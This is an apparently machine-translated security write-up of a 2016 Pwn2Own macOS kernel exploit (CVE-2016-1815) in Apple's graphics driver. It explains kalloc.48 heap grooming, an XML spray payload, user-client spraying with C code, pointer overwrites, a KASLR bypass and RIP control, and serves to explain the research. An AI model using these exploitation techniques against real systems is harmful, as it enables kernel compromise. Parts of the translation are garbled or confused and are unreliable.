A rectangle PWN drops one of the whole kernel series - zone dance
Does a rectangle PWN drop the whole kernel? It sounds like Madrid didn't think about it, but it happened in pwn2own in Vancouver in March this year. This series of articles will share our experience of discovery and utilization of blitzard cve-2016-1815, which is used for sandbox escape. In this paper, we will first ask you to introduce the second and third steps – the dance of kalloc.48 and kalloc.8192 sword without front. In the last article, we will return to the origin and introduce the cause of the vulnerability.
Blitzard
kalloc.48的舞蹈
kalloc.8192 重剑无锋
Take away
We use the OOB of a vector to cross the boundary, and convert it into a primitive with arbitrary address but limited value through careful heap memory layout. Then we use the primitive to implement infoleak to bypass kaslr and finally control rip.
Igvector:: add function
char __fastcall IGVector<rect_pair_t>::add(IGVector *this, rect_pair_t *a2)
{
v3 =;
if ( this->currentSize != this->capacity )
goto LABEL_4;
LOBYTE(v4) = IGVector<rect_pair_t>::grow(this, 2 * v3);
if ( v4 )
LABEL_4:
this->currentSize += 1;
v5 =;
*(this->storage + 32 * this->currentSize + 24) = a2->field_18; //rect2.len height
*(this->storage + 32 * this->currentSize + 16) = a2->field_10; //rect2.y x
*(this->storage + 32 * this->currentSize + 8) = a2->field_8; //rect1.len height
*(this->storage + 32 * this->currentSize) = a2->field_0; //rect1.y x
}
return v4;
Igvector is a generic template class frequently used in the apple graphics driver. Its head is currentsize field, followed by a capacity field, which records the maximum capacity of the current vector. This field is followed by the storage pointer, which represents the heap address of the storage area of this vector. Rect ﹣ pair ﹣ is a pair of rectangles. Each rectangle uniquely represents a drawing area on the screen. Its field is as follows:
IGVector
currentSize
capacity
storage
rect_pair_t
- Int16 x
- Int16 y
- Int16 w
- Int16 H
x. Y represents the coordinates of the rectangle angle, while W and H represent the width and height of the rectangle. These four elements can determine a rectangle only in the coordinate system. At the beginning, these rectangles existed in the form of shaping, but after a series of scaling and segmentation operations, they were transformed into ieee.754 floating-point numbers. These floating-point operations bring us some difficulties in reverse driving, because the F5 plug-in of IDA can't recognize and organize SSE floating-point instructions very well. At the same time, it also limits the content that our OOB can control.
x,y
w,h
When this OOB occurs, the memory layout is as shown in the following figure: it can be found that the igvector:: add function call occurs on a 48 size igvector that is partially out of bounds. But here sizefield is nailed to 0xdeadbeefdeadbeef because kalloc.48 is smaller than cacheline, so it must be dyed by zone allocator after free. Fortunately, capacity and storage are two things we can control. If the following conditions can be met, then we have an arbitrary address write across all address spaces.
IGVector::add
IGVector
size
capacity
storage
And
But it's still not a primitive that writes arbitrary values. As mentioned earlier, the fields of the rectangle exist in the form of signed int16, that is, in the range of [- 0x8000, 0x7ffff]. When the functions triggering OOB are called, they have been processed into ieee.754 floating-point numbers, which means that we can only use this primitive to trigger two consecutive values four times in the range [0x3 0x4... 0xc... 0xd... , 0xbf800000] is written in 4 bytes (where 0xbf800000 is the floating-point representation of - 1), and finally 32 bytes of memory is written out.
It seems that this is not good news, but here we need to find a way to stabilize this bad writing first, and then introduce how to use this writing to complete the final utilization.
Control zone kalloc.48
As shown in the above figure, we need to precisely control the memory content when overflow occurs, otherwise bad access will be generated and the kernel will crash. Unfortunately, kalloc.48 happens to be a relatively active zone in the kernel, among which iochaport is the largest active molecule. It is self-evident that the memory content of the iomachinport is not controllable, that is to say, we need to avoid its interference.
IOMachPort
IOMachPort
Throughout the history, the commonly used memory layout method is to use IO open service extended and ool msg to layout the kernel heap. But they have their own advantages and disadvantages: – ool ﹣ MSG has little side-effect on the heap, but the content of the header 0x18 bytes is uncontrollable, and our vulnerability just requires the precise 8-byte control of the header 0x8 bytes – IO ﹣ open ﹣ service ﹣ extended will cause huge side-effect in kalloc.48, because each time we implement heap injection, we will cause a new iomachport to be allocated
io_open_service_extended
ool_msg
ool_msg
io_open_service_extended
IOMachPort
We found and used a new heap spray method here: iocataloguesenddata. As shown in the following code snippet. Only one masterport is needed to implement the heap injection, with small side effects, energy saving and environmental protection
IOCatalogueSendData
IOCatalogueSendData(
mach_port_t _masterPort,
uint32_t flag,
const char *buffer,
uint32_t size )
{
//...
kr = io_catalog_send_data( masterPort, flag,
(char *) buffer, size, &result );
//...
if ((masterPort != MACH_PORT_NULL) && (masterPort != _masterPort))
mach_port_deallocate(mach_task_self(), masterPort);
//...
}
/* Routine io_catalog_send_data */
kern_return_t is_io_catalog_send_data(
mach_port_t master_port,
uint32_t flag,
io_buf_ptr_t inData,
mach_msg_type_number_t inDataCount,
kern_return_t * result)
{
//...
if (inData) {
//...
kr = vm_map_copyout( kernel_map, &map_data, (vm_map_copy_t)inData);
data = CAST_DOWN(vm_offset_t, map_data);
// must return success after vm_map_copyout() succeeds
if( inDataCount ) {
obj = (OSObject *)OSUnserializeXML((const char *)data, inDataCount);
//...
switch ( flag ) {
//...
case kIOCatalogAddDrivers:
case kIOCatalogAddDriversNoMatch: {
//...
array = OSDynamicCast(OSArray, obj);
if ( array ) {
if ( !gIOCatalogue->addDrivers( array ,
flag == kIOCatalogAddDrivers) ) {
//...
}
break;
//...
}
bool IOCatalogue::addDrivers(
OSArray * drivers,
bool doNubMatching)
{
//...
while ( (object = iter->getNextObject()) ) {
// xxx Deleted OSBundleModuleDemand check; will handle in other ways for SL
OSDictionary * personality = OSDynamicCast(OSDictionary, object);
//...
// Add driver personality to catalogue.
OSArray * array = arrayForPersonality(personality);
if (!array) addPersonality(personality);
else
{
count = array->getCount();
while (count--) {
OSDictionary * driver;
// Be sure not to double up on personalities.
driver = (OSDictionary *)array->getObject(count);
//...
if (personality->isEqualTo(driver)) {
break;
}
}
if (count >= 0) {
// its a dup
continue;
}
result = array->setObject(personality);
//...
set->setObject(personality);
}
//...
}
The adddrivers function takes osarray as input, which meets the following conditions: – osarray contains osdict – osdict contains key ioproviderclass – osdict cannot be the same as osdict that already exists in the catalog
addDrivers
OSArray
OSArray
OSDict
OSDict
IOProviderClass
OSDict
OSDict
We can prepare our layout payload in the following XML format, and send them through iocataloguesenddata (master port, 2, buf, 4096). Send as many times as you want
<array>
<dict>
<key>IOProviderClass</key>
<string>ZZZZ</string>
<key>ZZZZ</key>
<array>
<string>AAAAAAAAAAAAAAAAAAAAAA</string>
<string>AAAAAAAAAAAAAAAAAAAAAB</string>
...
<string>ZZZZZZZZZZZZZZZZZZZZZZ<string>
</array>
</dict>
</array>
With this method, we have the steps to play in kalloc.48: – spray a combination of VM map copy and 50 iocataloguesenddata (the content is completely controllable), the size is 0x30 – release 1 / 3 to 2 / 3 of the ool MSG, dig a hole in the heap – trigger the leak hole, and let people fall into the hole. Because we dig enough pits, the layout of the pile will tend to be stable, with a great probability to meet our expectations, allowing us to achieve stable and multiple arbitrary address writing, completing the first step of the three steps.
vm_map_copy
IOCatalogueSendData
ool_msg
What about the back?
Control rip with a float
When we have a stable write, how to control rip? A naive idea is to write the virtual table pointer of userclient directly. However, due to the limitation of the vulnerability's write range, this is not feasible, as shown in the following figure: note that the address space beginning with 0xbf in the kernel is an illegal address.
However, thanks to the MOV instruction in x86, we do not require strict 8-byte alignment. In fact, we can write a 4-byte alignment, as shown in the following figure:
It looks like that, but it's not so simple. In the vast number of userclients, only the high byte of VTable pointer address of rootdomainuserclient is 0xffffff80, while the high address of other userclient VTable pointers is 0xffff7f. However, according to the characteristics of kaslr, the kernel heap address can hardly occupy this area. Is it feasible to write out the rootdomainuserclient?
RootDomainUserClient
RootDomainUserClient
Why spray so slowly?
Because the size of rootdomainuserclient is relatively small, we need to spray a large number of the userclient to ensure that there is a relatively large probability that the userclient will be located at some predicted addresses. In the process of practice, we found that the speed of injection decreased as the number of userclients increased. We investigated some relevant codes, as shown in the following figure:
RootDomainUserClient
bool IORegistryEntry::attachToParent( IORegistryEntry * parent,
1621 const IORegistryPlane * plane )
1622 {
1623 OSArray * links;
1624 bool ret;
1625 bool needParent;
//...
1635 ret = makeLink( parent, kParentSetIndex, plane );
1636
1637 if( (links = parent->getChildSetReference( plane )))
1638 needParent = (false == arrayMember( links, this ));
1639 else
1640 needParent = true;
1641
//...
1669 if( needParent)
1670 ret &= parent->attachToChild( this, plane );
1671
1672 return( ret );
We can see that arraymember does linear search for the attached client. If you have studied, you should realize that this is an O (n ^ 2) complexity.
arrayMember
The later code makes this more complicated. Before the userclient is opened, they need to attach to the corresponding parent, which will call parent - > attachtochild
parent->attachTochild
bool IORegistryEntry::attachToChild( IORegistryEntry * child,
1684 const IORegistryPlane * plane )
1685 {
1686 OSArray * links;
//...
1694
1695 ret = makeLink( child, kChildSetIndex, plane );
```
then
```
bool IORegistryEntry::makeLink( IORegistryEntry * to,
1314 unsigned int relation,
1315 const IORegistryPlane * plane ) const
1316 {
1317 OSArray * links;
1318 bool result = false;
//...
1323 result = arrayMember( links, to );
1324 if( !result)
1325 result = links->setObject( to );
1326
1327 } else {
Here links is a OSArray, and setObject inserts the new userclient into the array store, and then calls a time-consuming function:
links
setObject
unsigned int OSArray::ensureCapacity(unsigned int newCapacity)
185 {
//...
203 newArray = (const OSMetaClassBase **) kalloc_container(newSize);
204 if (newArray) {
205 oldSize = sizeof(const OSMetaClassBase *) * capacity;
206
207 OSCONTAINER_ACCUMSIZE(((size_t)newSize) - ((size_t)oldSize));
208
209 bcopy(array, newArray, oldSize);
210 bzero(&newArray[capacity], newSize - oldSize);
211 kfree(array, oldSize);
212 array = newArray;
So the conclusion from this round is that the injection of userclient has the time complexity of O (n ^ 2), which forces us to choose a large userclient for the heap injection, because this year's competition model MacBook uses a core processor that can be ignored, which will make the explosion run slower than the snail, if we still hang on the root domain userclient tree.
RootDomainUserClient
Igaccelvideocontext is coming to the rescue
We continue to search for available userclients based on the following conditions: – must be able to open and call from the sandbox – the size must be greater than PageSize, the larger the better
The igaccelvideocontext occupying two pages is exactly the Savior we are looking for. Basically, all ioaccelerator family2 userclients have a service pointer to intelcaccelerator. For igaccelvideocontext, it is at 0x528. We can write down the lower 4 bytes of the heap address to point it to the heap content under our control and trigger the virtual call.
IGAccelVideoContext
service
IntelAccelerator
IGAccelVideoContext
RIP control
Although there are virtual function calls here, we can't call the virtual function of service directly, because the content header of VM map copy layout mentioned above is uncontrollable. Here, the context [u finish interface indirectly calls virtual functions on the service - > meventmachine, which just meets our needs.
service
vm_map_copy
context_finish
service->mEventMachine
__int64 __fastcall IOAccelContext2::context_finish(IOAccelContext2 *this)
{
int v1; // [email protected]
unsigned int v2; // [email protected]
v1 = this->service->mEventMachine->vt->__ZN24IOAccelEventMachineFast219finishEventUnlockedEP12IOAccelEvent(
this->service->mEventMachine,
Now let's adjust the direction and write down the service field of any igaccelvideocontext. Without knowing the specific heap address, we have to continue spraying. The specific steps are as follows: – spray 0x50000 ool · msgs, push the heap to 0xffffff80 bf800000 (address B) - release the middle, spray igaccelvideocontext, and ensure that the middle address a 0xffff80 62388000 is occupied by it - trigger the vulnerability, write a - 4 + 0x528, Write the service pointer as 0xffffff80 bf800000 (address B) - call the external method of these sprayed userclients to check the corruption
IGAccelVideoContext
service
B
A
A - 4 + 0x528
service
Why do we choose a and B, which look like magic number addresses? As we mentioned earlier, we can only write floats in a specific range. For example, we can write 0xffffff80 deadbeef as 0xffffff80 3xxxxxx, 0xffff80 4xxxxxx, 0xffffff80 cxxxxxx, 0xffffff80 dxxxxxx and 0xffffff80 bf800000. But in so many addresses, it is too low (kslide will change every time it starts, and the high slide will push the heap base address to 0xffffff80 4xxxxxx), or it's too high (not enough memory, too long to spray). So in the end, we choose to write 0xbf800000, half of which is a
The steps are as follows:
mach_msg_size_t size = 0x2000;
mach_port_name_t my_port[0x500];
memset(my_port, 0, 0x500 * sizeof(mach_port_name_t));
char *buf = malloc(size);
memset(buf, 0x41, size);
*(unsigned long *)(buf - 0x18 + 0x1230) = 0xffffff8062388000 - 0xd0 + 2;
*(unsigned long *)(buf - 0x18 + 0x230) = 0xffffff8062388000 - 0xd0 + 2;
for (int i = 0; i < 0x500; i++) {
*(unsigned int *)buf = i;
printf("number %x success with %x.\n",i , send_msg(buf, size, &my_port[i]));
}
for (int i = 0x130; i < 0x250; i++)
{
read_kern_data(my_port[i]);
}
printf("press enter to fill in IOSurface2.\n");
io_service_t serv = open_service("IOAccelerator");
io_connect_t *deviceConn2;
deviceConn2 = malloc(0x12000 * sizeof(io_connect_t));
kern_return_t kernResult;
for (int i =0; i < 0x12000; i ++)
{
kernResult = IOServiceOpen(serv, mach_task_self(), 0x100, &deviceConn2[i]);
printf("%x with result %x.\n", i , kernResult);
}
This picture will see better.
So it's over here? Not yet.
Head or middle?
Smart readers may have problems in front of them. You spray 0x2000. How can you guarantee that a is just in the user client header you spray? Maybe in the middle.
Yes, it is. If it falls in the middle, we need to write out a - 4 + 0x528 and a - 4 + 0x528 + 0x1000 to ensure coverage in both cases.
A - 4 + 0x528
A - 4 + 0x528 + 0x1000
Bypassing kASLR
What happened to kaslr? Now we know that address a is overwritten by igaccelvideocontext, and address B is overwritten by VM map? Copy. Now that we have made the pointer point to the user client of the fake layout, is there any interface that can return the content of an address in a user client? Get ABCD steps found by searching
IGAccelVideoContext
vm_map_copy
get_hw_steppings
`\
\
__int64 __fastcall IGAccelVideoContext::get_hw_steppings(IGAccelVideoContext *a1, _DWORD *a2)
{
__int64 service; // [email protected]
service = a1->service;
*a2 = *(_DWORD *)(service + 0x1140);
a2[1] = *(_DWORD *)(service + 0x1144);
a2[2] = *(_DWORD *)(service + 0x1148);
a2[3] = *(_DWORD *)(service + 0x114C);
a2[4] = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
return 0LL;
}
`\
\
Pay attention to this line.
"
\
a24 = *(unsigned __int8 *)(*(_QWORD *)(service + 0x1288) + 0xD0LL);
`\Recall that service + 0x1288 has been controlled by us, so this is a perfect primitive read from any address. We take the following steps: – fill VM map copy at B – trigger vulnerability, override service pointer to B, which means it points to VM map copy filled with 0x414141414141 (except for 0x1288, which is set to a-0xd0) - call get HW steps to detect 414141. If this result is returned, then this userclient has been modified by us – A24 returns one byte of a address, repeat the above steps and read all contents
\
service+0x1288
The picture below will make you understand better.
Head or middle
Smart readers will realize that B may also fall in the middle of VM map copy, just like a. For the B problem, as the above solution, we write 0x1288 and 0x288 as a – 0xd0. If the place we read is the normal igaccelvideocontext 0x1000 offset, then according to its characteristics, it is 0
IGAccelVideoContext
This means that we can distinguish the head and tail through this feature, and try twice at most, as shown in the figure below. Finally realize arbitrary address disclosure
summary
The video of this attack can be found at http://v.qq.com/x/page/f0196p3g7vq.html.
So what is the magic matrix flaw? It's so complicated to exploit. How about the loopholes? Please look forward to the following articles. If you can't wait, please see our ppt on blackhat USA